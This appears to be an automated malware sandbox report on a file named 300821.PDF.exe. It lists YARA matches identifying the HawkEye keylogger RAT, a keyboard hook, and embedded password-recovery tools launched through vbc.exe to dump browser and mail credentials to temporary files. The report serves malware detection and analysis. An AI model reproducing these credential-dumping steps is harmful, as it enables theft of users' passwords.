                      Source: Yara matchFile source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 300821.PDF.exe PID: 4816, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 300821.PDF.exe PID: 2848, type: MEMORYSTR
                      Contains functionality to log keystrokes (.Net Source)Show sources
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040D674 OpenClipboard,GetLastError,DeleteFileW,

                      System Summary:

                      barindex
                      Malicious sample detected (through community Yara rule)Show sources
                      Source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                      Source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                      Source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                      Source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                      Source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                      Source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                      Source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                      Source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                      Source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Source: 5.2.300821.PDF.exe.2b8b210.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                      Source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                      Source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                      Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                      Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                      Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: 300821.PDF.exe
                      Source: 300821.PDF.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                      Source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                      Source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                      Source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                      Source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                      Source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                      Source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                      Source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                      Source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: 5.2.300821.PDF.exe.2b8b210.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 5.2.300821.PDF.exe.2b8b210.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                      Source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: 5.2.300821.PDF.exe.2b9f140.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                      Source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                      Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                      Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                      Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 0_2_014BC774
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 0_2_014BEBC8
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 0_2_014BEBD0
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 5_2_0100B29C
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 5_2_0100C310
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 5_2_0100B290
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 5_2_010099D0
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 5_2_0100DFD4
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 5_2_078BEEC8
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 5_2_078BBDB0
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 5_2_078BB4E0
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 5_2_078BB198
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 5_2_078B0006
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00404419
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00404516
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00413538
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004145A1
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040E639
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004337AF
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004399B1
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0043DAE7
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00405CF6
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00403F85
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00411F99
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 9_2_00404DDB
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 9_2_0040BD8A
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 9_2_00404E4C
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 9_2_00404EBD
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 9_2_00404F4E
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413F8E appears 66 times
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413E2D appears 34 times
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00442A90 appears 36 times
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004141D6 appears 88 times
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00411538 appears 35 times
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                      Source: 300821.PDF.exe, 00000000.00000000.646783679.0000000000B54000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePermissionTokenTy.exe4 vs 300821.PDF.exe
                      Source: 300821.PDF.exe, 00000000.00000002.665512649.0000000002F61000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs 300821.PDF.exe
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 300821.PDF.exe
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 300821.PDF.exe
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs 300821.PDF.exe
                      Source: 300821.PDF.exe, 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs 300821.PDF.exe
                      Source: 300821.PDF.exe, 00000005.00000002.914852262.0000000000482000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs 300821.PDF.exe
                      Source: 300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 300821.PDF.exe
                      Source: 300821.PDF.exe, 00000005.00000002.914958023.00000000007E4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePermissionTokenTy.exe4 vs 300821.PDF.exe
                      Source: 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs 300821.PDF.exe
                      Source: 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 300821.PDF.exe
                      Source: 300821.PDF.exeBinary or memory string: OriginalFilenamePermissionTokenTy.exe4 vs 300821.PDF.exe
                      Source: 300821.PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 300821.PDF.exeReversingLabs: Detection: 21%
                      Source: 300821.PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\300821.PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\300821.PDF.exe 'C:\Users\user\Desktop\300821.PDF.exe'
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess created: C:\Users\user\Desktop\300821.PDF.exe C:\Users\user\Desktop\300821.PDF.exe
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess created: C:\Users\user\Desktop\300821.PDF.exe C:\Users\user\Desktop\300821.PDF.exe
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                      Source: C:\Users\user\Desktop\300821.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\300821.PDF.exe.logJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\bhvE2B1.tmpJump to behavior
                      Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@7/5@2/2
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe, 00000008.00000002.693074434.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,
                      Source: C:\Users\user\Desktop\300821.PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\300821.PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,
